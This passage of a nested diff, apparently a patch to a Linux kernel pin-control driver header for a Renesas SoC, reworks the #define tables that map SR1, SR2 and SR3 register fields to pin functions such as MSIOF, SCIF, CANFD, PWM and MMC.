+-#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR1_3_0	FM(HRX0)		FM(RX0)			F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_7_4	FM(SCIF_CLK)		FM(IRQ4_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_27_24	FM(AUDIO_CLKIN)		FM(PWM3_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2)		FM(MSIOF4_SS1)	FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP3SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP3SR1_3_0	FM(HRX3)		FM(SCK3_A)		FM(MSIOF4_SS2)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_7_4	FM(HSCK3)		FM(CTS3_N_A)		FM(MSIOF4_SCK)	FM(TPU0TO0_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_11_8	FM(HRTS3_N)		FM(RTS3_N_A)		FM(MSIOF4_TXD)	FM(TPU0TO1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_15_12	FM(HCTS3_N)		FM(RX3_A)		FM(MSIOF4_RXD)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_19_16	FM(HTX3)		FM(TX3_A)		FM(MSIOF4_SYNC)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_A)		FM(TX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_A)		FM(RX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_A)		FM(RTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_A)		FM(CTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_A)		FM(SCK3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_23_20	FM(MSIOF1_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_X)		FM(TX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_X)		FM(RX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_X)		FM(CTS1_N_X)		FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_X)		FM(RTS1_N_X)		FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_X)		FM(SCK1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_15_12	FM(MSIOF0_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_19_16	FM(HTX0)		FM(TX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR1_3_0	FM(HRX0)		FM(RX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_7_4	FM(SCIF_CLK)		FM(IRQ4_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_27_24	FM(AUDIO_CLKIN)		FM(PWM3_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2)		FM(MSIOF4_SS1)		FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR1_3_0	FM(HRX3)		FM(SCK3_A)		FM(MSIOF4_SS2)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_7_4	FM(HSCK3)		FM(CTS3_N_A)		FM(MSIOF4_SCK)		FM(TPU0TO0_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_11_8	FM(HRTS3_N)		FM(RTS3_N_A)		FM(MSIOF4_TXD)		FM(TPU0TO1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_15_12	FM(HCTS3_N)		FM(RX3_A)		FM(MSIOF4_RXD)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_19_16	FM(HTX3)		FM(TX3_A)		FM(MSIOF4_SYNC)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR2 */
+-/* IP0SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_7_4	FM(FXR_TXENA_N)		FM(CANFD1_RX)		FM(TPU0TO3_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX)		FM(IRQ5)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX)		FM(IRQ4_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_19_16	FM(RXDB_EXTFXR)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_23_20	FM(FXR_TXENB_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_27_24	FM(FXR_TXDB)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_31_28	FM(TPU0TO1)		FM(CANFD6_TX)		F_(0, 0)	FM(TCLK2_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR2_3_0	FM(TPU0TO0)		FM(CANFD6_RX)		F_(0, 0)	FM(TCLK1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_X)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_X)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_15_12	FM(CANFD0_RX)		FM(STPWT_EXTFXR)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2)		F_(0, 0)	FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3)		FM(PWM1_B)	FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_31_28	FM(CANFD3_RX)		F_(0, 0)		FM(PWM3_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR2_3_0	FM(CANFD4_TX)		F_(0, 0)		FM(PWM4)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_7_4	FM(CANFD4_RX)		F_(0, 0)		FM(PWM5)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_11_8	FM(CANFD7_TX)		F_(0, 0)		FM(PWM6)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_15_12	FM(CANFD7_RX)		F_(0, 0)		FM(PWM7)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_7_4	FM(FXR_TXENA_N)		FM(CANFD1_RX)		FM(TPU0TO3_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX)		FM(IRQ5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX)		FM(IRQ4_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_19_16	FM(RXDB_EXTFXR)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_23_20	FM(FXR_TXENB_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_27_24	FM(FXR_TXDB)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_31_28	FM(TPU0TO1)		FM(CANFD6_TX)		F_(0, 0)		FM(TCLK2_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR2_3_0	FM(TPU0TO0)		FM(CANFD6_RX)		F_(0, 0)		FM(TCLK1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_15_12	FM(CANFD0_RX)		FM(STPWT_EXTFXR)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2)		F_(0, 0)		FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3)		FM(PWM1_B)		FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_31_28	FM(CANFD3_RX)		F_(0, 0)		FM(PWM3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR2_3_0	FM(CANFD4_TX)		F_(0, 0)		FM(PWM4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_7_4	FM(CANFD4_RX)		F_(0, 0)		FM(PWM5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_11_8	FM(CANFD7_TX)		F_(0, 0)		FM(PWM6)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_15_12	FM(CANFD7_RX)		F_(0, 0)		FM(PWM7)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR3 */
+-/* IP0SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR3_3_0	FM(MMC_SD_D1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_7_4	FM(MMC_SD_D0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_11_8	FM(MMC_SD_D2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_15_12	FM(MMC_SD_CLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_19_16	FM(MMC_DS)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
